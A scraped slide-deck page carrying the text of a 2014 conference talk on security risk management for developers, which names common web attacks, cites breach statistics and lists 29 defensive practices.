Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical OverviewCyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical OverviewSymantec
 
The Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThe Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThreatConnect
 
SplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud DetectionSplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud DetectionSplunk
 
The Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
The Cloud 9 - Threat & Solutions 2016 by Bobby DominguezThe Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
The Cloud 9 - Threat & Solutions 2016 by Bobby DominguezEC-Council
 
Applied cognitive security complementing the security analyst
Applied cognitive security complementing the security analyst Applied cognitive security complementing the security analyst
Applied cognitive security complementing the security analyst Priyanka Aash
 

Similaire à Former CTO Shares Tips on Security Risk Management (20)

dotScale 2014
dotScale 2014dotScale 2014
dotScale 2014
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
 
Security News Bytes June 2014
Security News Bytes June 2014Security News Bytes June 2014
Security News Bytes June 2014
 
Website Security Threats - January 2014 Update
Website Security Threats - January 2014 Update Website Security Threats - January 2014 Update
Website Security Threats - January 2014 Update
 
SplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral AnalyticsSplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral Analytics
 
Mind the gap
Mind the gapMind the gap
Mind the gap
 
PCI DSS Simplified: What You Need to Know
PCI DSS Simplified: What You Need to KnowPCI DSS Simplified: What You Need to Know
PCI DSS Simplified: What You Need to Know
 
Symantec Intelligence Report December 2014
Symantec Intelligence Report December 2014Symantec Intelligence Report December 2014
Symantec Intelligence Report December 2014
 
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industrySeminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
 
Combating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside OutCombating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside Out
 
The malware monetization machine
The malware monetization machineThe malware monetization machine
The malware monetization machine
 
Save Your Network – Protecting Manufacturing Data from Deadly Breaches
Save Your Network – Protecting Manufacturing Data from Deadly BreachesSave Your Network – Protecting Manufacturing Data from Deadly Breaches
Save Your Network – Protecting Manufacturing Data from Deadly Breaches
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
 
Cyber Risk Management in 2017 - Challenges & Recommendations
Cyber Risk Management in 2017 - Challenges & RecommendationsCyber Risk Management in 2017 - Challenges & Recommendations
Cyber Risk Management in 2017 - Challenges & Recommendations
 
(Certificates2019)alireza.ghahrood
(Certificates2019)alireza.ghahrood(Certificates2019)alireza.ghahrood
(Certificates2019)alireza.ghahrood
 
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical OverviewCyber Tech Israel 2016: Advanced Threat Protection Technical Overview
Cyber Tech Israel 2016: Advanced Threat Protection Technical Overview
 
The Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThe Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence Webinar
 
SplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud DetectionSplunkLive! Splunk for Insider Threats and Fraud Detection
SplunkLive! Splunk for Insider Threats and Fraud Detection
 
The Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
The Cloud 9 - Threat & Solutions 2016 by Bobby DominguezThe Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
The Cloud 9 - Threat & Solutions 2016 by Bobby Dominguez
 
Applied cognitive security complementing the security analyst
Applied cognitive security complementing the security analyst Applied cognitive security complementing the security analyst
Applied cognitive security complementing the security analyst
 

Plus de Alison Gianotto

Security Bootcamp for Startups and Small Businesses
Security Bootcamp for Startups and Small Businesses Security Bootcamp for Startups and Small Businesses
Security Bootcamp for Startups and Small Businesses Alison Gianotto
 
Laravel 5.2 Gates, AuthServiceProvider and Policies
Laravel 5.2 Gates, AuthServiceProvider and PoliciesLaravel 5.2 Gates, AuthServiceProvider and Policies
Laravel 5.2 Gates, AuthServiceProvider and PoliciesAlison Gianotto
 
Failing well: Managing Risk in High Performance Applications
Failing well: Managing Risk in High Performance ApplicationsFailing well: Managing Risk in High Performance Applications
Failing well: Managing Risk in High Performance ApplicationsAlison Gianotto
 
Facebook Timeline for Pages
Facebook Timeline for PagesFacebook Timeline for Pages
Facebook Timeline for PagesAlison Gianotto
 
Getting users to care about security
Getting users to care about securityGetting users to care about security
Getting users to care about securityAlison Gianotto
 
Twitter 101: 140 characters. Don't be a douche.
Twitter 101: 140 characters. Don't be a douche.Twitter 101: 140 characters. Don't be a douche.
Twitter 101: 140 characters. Don't be a douche.Alison Gianotto
 

Plus de Alison Gianotto (8)

Security Bootcamp for Startups and Small Businesses
Security Bootcamp for Startups and Small Businesses Security Bootcamp for Startups and Small Businesses
Security Bootcamp for Startups and Small Businesses
 
Laravel 5.2 Gates, AuthServiceProvider and Policies
Laravel 5.2 Gates, AuthServiceProvider and PoliciesLaravel 5.2 Gates, AuthServiceProvider and Policies
Laravel 5.2 Gates, AuthServiceProvider and Policies
 
Failing well: Managing Risk in High Performance Applications
Failing well: Managing Risk in High Performance ApplicationsFailing well: Managing Risk in High Performance Applications
Failing well: Managing Risk in High Performance Applications
 
DNS 101 for Non-Techs
DNS 101 for Non-TechsDNS 101 for Non-Techs
DNS 101 for Non-Techs
 
Security Primer
Security PrimerSecurity Primer
Security Primer
 
Facebook Timeline for Pages
Facebook Timeline for PagesFacebook Timeline for Pages
Facebook Timeline for Pages
 
Getting users to care about security
Getting users to care about securityGetting users to care about security
Getting users to care about security
 
Twitter 101: 140 characters. Don't be a douche.
Twitter 101: 140 characters. Don't be a douche.Twitter 101: 140 characters. Don't be a douche.
Twitter 101: 140 characters. Don't be a douche.
 

Dernier

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 

Dernier (20)

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 

Former CTO Shares Tips on Security Risk Management

  • 2. Alison Gianotto (aka “snipe”)WHO AM I? • Former  agency  CTO/CSO   • Security  &  privacy  advocate   • 20  years  in  IT  and  so<ware  development   • Co-­‐author  of  a  few  PHP/MySQL  books   • Survivor  of  more  corporate  audits  than  I   care  to  remember   • @snipeyhead  on  TwiJer   2  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  • 3. WHAT SECURITY ISN’T 1 Bolted on 2 Compliance 3 A Single Person 4 Outsourced 3   You  don’t  add  it  on  at  the  end.     You  can  be  compliant  and  not   secure.  Just  ask  Target.   Security  is  everyone’s  responsibility.   Throwing  money  at  this  problem   won’t  work.   Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  • 4. WHAT SECURITY ISN’T 5 An Appliance 6 Silver Bullet 7 Straightforward 4   Firewalls  and  IDS  are  part  of  the   soluUon,  but  not  the  end.   There  is  no  one  thing.  Defence  in   depth  maJers.  Sort  of.     SomeUmes  implemenUng  security   tools  increases  your  aJack  surface.   Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   8 Done Security  is  where  you  start,  not   where  you  finish.  
  • 5. WHAT RISK ISN’T 1 Stifling 2 Boring 3 Avoidable 5   Managing  risk  doesn’t  have  to   hinder  innovaUon   Our  job  is  finding  creaUve  soluUons   to  problems.  This  is  one  more  tool.   Risk  isn’t  inherently  bad.  Not   understanding  your  risk  is.     Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   4 One Size Acceptable  risk  to  your  company   may  not  be  the  same  as  someone   else’s.    
  • 6. IT IS IMPOSSIBLE TO ANTICIPATE EVERY RISK. 6  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Srsly.
  • 7. DEFENSE IN DEPTH PROMISES 7  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • MiUgates  single  points  of  failure.  (“Bus  factor”)   • Requires  more  effort  on  the  part  of  the  aJacker,   theoreUcally  exhausUng  aJacker  resources.     Except...
  • 8. DEFENSE IN DEPTH PROBLEMS 8  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Larger,  more  complicated  systems  are  harder  to  maintain.     • Leads  to  more  cracks  for  bad  guys  to  poke  at   • More  surfaces  that  can  get  be  overlooked     • The  bad  guys  have  nearly  limitless  resources.  We  don’t.     • AJacks  are  commodiUzed  now.    Botnets  for  $2/hour.  
  • 10. CONFIDENTIALITY IS A SET OF RULES THAT LIMITS ACCESS TO INFORMATION 10  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  • 11. CONFIDENTIALITY EXAMPLES 11  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Passwords.  (boo!)   • Data  encrypUon  (at  rest  and   in  transmission.)   • Two-­‐factor  authenUcaUon/ biometrics.  (Yay!)   • Corporate  VPN   • IP  WhitelisUng   • SSH  keys  
  • 12. CONFIDENTIALITY RISKS 12  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • No  brute-­‐force  detecUon   • No  velng  of  how  third-­‐ party  vendors  use/store   customer  data   • InformaUon  leakage  from   login  messages  (Uming   aJacks,  etc.)   • SQL  injecUon     • Privilege  escalaUon  leading   to  admin  access     • Passwords  shared  across   websites   • Improper  disposal/ destrucUon  of  personal   data   • Lost/stolen  devices    
  • 13. INTEGRITY IS THE ASSURANCE THAT THE INFORMATION IS TRUSTWORTHY & ACCURATE. 13  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  • 14. INTEGRITY RISKS 14  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Data  loss  due  to  hardware   failure  (server  crash!)   • So<ware  bug  that   unintenUonally  deletes/ modifies  data   • Data  alteraUon  via   authorized  persons  (human   error)   • Data  alteraUon  via   unauthorized  persons   (hackers)   • No  backups  or  no  way  to   verify  the  integrity  of  the   backups  you  have   • Third-­‐party  vendor  with   inadequate  security  
  • 15. AVAILABILITY IS A GUARANTEE OF READY ACCESS TO THE INFO BY AUTHORIZED PEOPLE. 15  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  • 16. AVAILABILITY RISKS 16  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • DDoS  aJacks   • Third-­‐party  service  failures   • Hardware  failures   • So<ware  bugs   • Untested  so<ware  patches   • Natural  disasters   • Man-­‐made  disasters  
  • 17. THINK YOU’RE TOO SMALL TO BOTHER WITH? 17  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Think again.
  • 18. WHY HACK? 18  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • To  steal/sell  idenUUes,  credit   card  numbers,  corporate   secrets,  military  secrets   • Fun,  Excitement  and/or   Notoriety   • PoliUcal  (“HackUvism”)   • Revenge   • Blackhat  SEO   • ExtorUon/Ransomware  
  • 19. COMMON ATTACKS 19  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Reflected  XSS   • Persistent  XSS   • CSRF   • SQL  InjecUon   • Remote  file  inclusion     • Local  file  inclusion/directory   traversal   • HosUng  malware   • Defacement  for  SEO   (pharma,  etc)   • Privilege  escalaUon    
  • 20. WHY MEEEEEEEEEEEE?? 20  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Users  re-­‐use  passwords   across  websites   • Watering  hole  aJack   • Low-­‐hanging  fruit   • Assumed  fewer  defenses   • To  gain  more  informaUon  on   users  to  execute  spear-­‐ phishing  aJacks   • Because  you  are  vulnerable.   Period.  
  • 21. IN 2013, 61% OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012. 21  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  • 22. 1 2 43 REFLECTED XSS SOCIAL     ENGINEERING   XSS   SESSION   HIJACK   PWNED   22  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  • 23. 77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY. 23  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  • 24. MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF >= 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT. 24  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  • 25. THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012. 25  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014     +700%
  • 26. OCT 2013: ADOBE EXPOSED CUSTOMER DATA, DEBIT/ CREDIT CARD NUMBERS, SOURCE IMPACTED: 152 MILLION USERS 26  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  • 27. DEC 2013: TARGET EXPOSED CUSTOMER DATA, DEBIT/ CREDIT CARD NUMBERS, PINS IMPACTED: 110 MILLION USERS 27  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  • 28. BREACHGrowth •  credit  card  info •  birth  dates •  government  ID  numbers •  home  addresses •  medical  records •  phone  numbers •  financial  informa9on •  email  addresses •  login •  passwords Data Stolen 28  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   232   552   0   100   200   300   400   500   600   2011   2013   Iden99es  Stolen  by  Year  (in  Millions)   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
  • 29. 190,000 464,000 570,000 2011   2012   2013   ATTACKS 29   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014     Per Day Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  • 30. APPSEC STRATEGY PICK  TWO   30   COMPLETELY  BONED  COMPLETELY  BONED   COMPLETELY  BONED   Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
  • 31. CREATING A RISK MATRIX 31  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Type   • Third-­‐Party   • Dataflow  diagram  ID   • DescripUon   • Triggering  AcUon   • Consequence  of  Service   Failure   • Risk  of  Failure   • User  Impact   • Method  used  for  monitoring   this  risk   • Efforts  to  MiUgate  in  Case  of   Failure   • Contact  info   Grab  a  starter  template  here!     hJp://snipe.ly/risk_matrix    
  • 32. 29 THINGS YOU CAN START DOING TODAY. 32  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Dooo eeeeeet.
  • 33. 33  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   1.  Start  every  project  risk-­‐first.   2.  Start  using  a  risk  matrix  for  every  major  project  or   product.   3.  Build  a  clear  inventory  of  surface  areas  and  their  value.   Get  stakeholders  involved.   4.  Make  sure  you  understand  what  happens  when  third-­‐ party  services  fail  or  behave  unexpectedly.       29 THINGS TO DO TODAY
  • 34. 34  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   5.  Trust  your  gut.  If  something  doesn’t  look  right,  it  probably   isn’t.   6.  Keep  your  systems  as  simple  as  possible.  Document  them.   7.  Favor  self-­‐documenUng  systems  so  that  code,  systems  and   docs  don't  fall  out  of  sync.   8.  Increased  transparency  reduces  risk  across  departments.   Consider  devops.     29 THINGS TO DO TODAY
  • 35. 35  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   9.  Don't  abstract  code/systems  if  you  don’t  have  to.   Premature  opUmizaUon  is  the  devil.  Build  light  and   refactor  as  needed.   10.   Get  to  know  your  users’  behavior.  Use  tools  like  Google   AnalyUcs  and  heat-­‐mapping  to  understand  what  users  do   on  your  site.  Be  suspicious  if  it  changes  for  no  apparent   reason.   29 THINGS TO DO TODAY
  • 36. 36  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   11.   Automate  EVERYTHING  (Chef,  Vagrant,  Ansible,  Salt,   Fabric,  etc.)   12.   Log  (almost!)  EVERYTHING.  Know  where  your  logs  are.   Use  a  central  logging  server  if  at  all  possible.     13.   Always  employ  the  principles  of  “least  privilege.”   14.   Give  preference  to  vendors  that  integrate  with  your  AD/     OD/LDAP.   29 THINGS TO DO TODAY
  • 37. 37  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   15.   Create  a  reliable  data  backup  plan  and  TEST  IT.  (MORE   THAN  ONCE.)   16.   Create  a  Business  ConUnuity  Plan.   17.   Create  an  Incident  Response  Plan.  Test  it.   18.   Create  a  Disaster  Recovery  Plan.  TEST  IT.  (Seriously.)   19.   Get  your  team  to  parUcipate  in  at  least  one  CTF  every   year.     29 THINGS TO DO TODAY
  • 38. 29 THINGS TO DO TODAY 38  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   20.   Strip  specific  messaging  from  login  forms.   21.   Use  solid  password+salUng  like  bcrypt.   22.   Implement  brute-­‐force  prevenUon  for  all  login  systems.   23.   Encrypt  everything,  where  feasible.   24.   Only  collect  the  data  that  you  absolutely  need.   25.   Implement  two-­‐factor  authenUcaUon.  It’s  easier  than  you   think.  
  • 39. 29 THINGS TO DO TODAY 39  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   26.   Supress  debugging  and  server  informaUon  (PHP  versions,   Apache  versions)   27.   Leverage  framework  CSRF  protecUon  and  data   saniUzaUon/validaUon.   28.   Perform  regular  penetraUon  tests  and  vulnerability   assessments   29.   Become  a  passionate  security  ambassador  for  your  users   and  co-­‐workers.      
  • 40. CAPTURE ALL THE FLAGS! 40  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   •  NotSoSecure  CTF:  hJp://cx.notsosecure.com   •  Security  Shepherd:  hJps://www.owasp.org/index.php/ OWASP_Security_Shepherd   •  hJp://hax.tor.hu/   •  hJps://pwn0.com/   •  hJp://www.smashthestack.org/   •  hJp://www.hellboundhackers.org/   •  hJp://www.overthewire.org/wargames/   •  hJp://counterhack.net/Counter_Hack/Challenges.html   •  hJp://www.hackthissite.org/   •  hJp://exploit-­‐exercises.com/   •  hJp://vulnhub.com/  
  • 41. Alison Gianotto (aka “snipe”)THANK YOU! • @snipeyhead  on  TwiJer   • snipe@snipe.net   41  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14